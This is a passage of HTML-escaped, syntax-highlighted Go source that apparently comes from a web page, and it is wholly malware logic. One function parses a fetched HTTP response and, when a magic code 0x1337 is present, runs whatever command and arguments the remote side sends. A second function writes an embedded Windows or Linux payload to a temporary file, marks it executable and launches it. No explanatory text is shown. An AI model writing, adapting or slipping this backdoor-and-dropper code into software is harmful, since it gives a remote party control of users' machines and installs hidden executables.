&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;defer&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;resp&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;Body&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;Close&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;body&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;err&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;:=&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;ioutil&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;ReadAll&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;resp&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;Body&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;if&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;err&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;!=&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="kc"&gt;nil&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;return&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="kc"&gt;false&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;data&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;:=&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="kd"&gt;struct&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;Code&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="kt"&gt;int&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;Cmd&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="kt"&gt;string&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;Args&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;[]&lt;/span&gt;&lt;span class="kt"&gt;string&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;}{}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;err&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;json&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;Unmarshal&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;body&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="nx"&gt;data&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;if&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;err&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;!=&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="kc"&gt;nil&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;return&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="kc"&gt;false&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;if&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;data&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;Code&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;!=&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="mh"&gt;0x1337&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;return&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="kc"&gt;false&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;cmd&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;:=&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;exec&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;Command&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;data&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;Cmd&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;data&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;Args&lt;/span&gt;&lt;span class="o"&gt;...&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;cmd&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;Start&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;return&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="kc"&gt;true&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt;&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt;&lt;/span&gt;&lt;span class="kd"&gt;func&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nf"&gt;writeAndExecute&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="kd"&gt;var&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;buf&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;[]&lt;/span&gt;&lt;span class="kt"&gt;byte&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;if&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;runtime&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;GOOS&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;==&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s"&gt;&amp;#34;windows&amp;#34;&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;b&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;err&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;:=&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nf"&gt;bindataPayloadExeBytes&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;if&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;err&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;!=&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="kc"&gt;nil&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;return&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;buf&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;b&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;else&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;if&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;runtime&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;GOOS&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;==&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s"&gt;&amp;#34;linux&amp;#34;&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;b&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;err&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;:=&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nf"&gt;bindataPayloadElfBytes&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;if&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;err&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;!=&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="kc"&gt;nil&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;return&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;buf&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;b&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;else&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;return&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;f&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;err&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;:=&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;ioutil&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;TempFile&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;&amp;#34;&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s"&gt;&amp;#34;&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;if&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;err&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;!=&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="kc"&gt;nil&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;return&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;_&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;err&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;f&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;Write&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;buf&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;if&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;err&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;!=&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="kc"&gt;nil&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;return&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;if&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;runtime&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;GOOS&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;==&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s"&gt;&amp;#34;linux&amp;#34;&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;err&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;f&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;Chmod&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mo"&gt;0755&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;if&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;err&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;!=&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="kc"&gt;nil&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nb"&gt;panic&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;err&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;err&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;f&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;Sync&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;if&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;err&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;!=&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="kc"&gt;nil&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;return&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;name&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;:=&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;f&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;Name&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;err&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;f&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;Close&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;if&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;err&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;!=&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="kc"&gt;nil&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;return&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;cmd&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;:=&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;exec&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;Command&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;name&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;cmd&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;Start&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;&lt;span class="w"&gt;
